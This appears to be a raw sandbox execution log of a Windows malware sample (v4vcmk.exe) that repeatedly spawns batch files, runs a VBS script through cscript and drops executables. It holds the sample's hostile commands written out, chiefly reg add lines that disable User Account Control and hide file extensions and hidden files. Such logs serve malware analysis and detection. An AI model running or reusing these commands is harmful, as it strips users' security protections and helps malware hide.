reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\Mssocsgc.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\sKcwwsUc.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\QEMMMwkc.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\gCwcEIAU.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\CGwoMIko.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\kYAoAkwU.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\IIsgMQIw.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\hyYMIkgw.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\NAAMkMIk.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\HYIQEwcM.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\jugkogQE.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\VmYcUgsM.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\viMIsUUs.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\SQMwcsUM.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\KuIIAocs.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\QmYkQwcs.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\YYMckAsg.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\tskkAAUA.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\HcwMEoQo.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\jyMMUUYk.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\PKQscwcE.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\ZeMMUgsA.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\mQUgQkwg\TIkMIsss.exe

"C:\Users\Admin\mQUgQkwg\TIkMIsss.exe"

C:\ProgramData\xcIAYMoI\YioMwUEg.exe

"C:\ProgramData\xcIAYMoI\YioMwUEg.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1828 -s 36

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1472 -s 36

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\XWgUMcMI.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\TsEocIQA.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\ssoAgcUs.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\KQAscYos.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\yMMkQcAU.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\ksEYoQAE.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\owwAQMQE.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cmd.exe

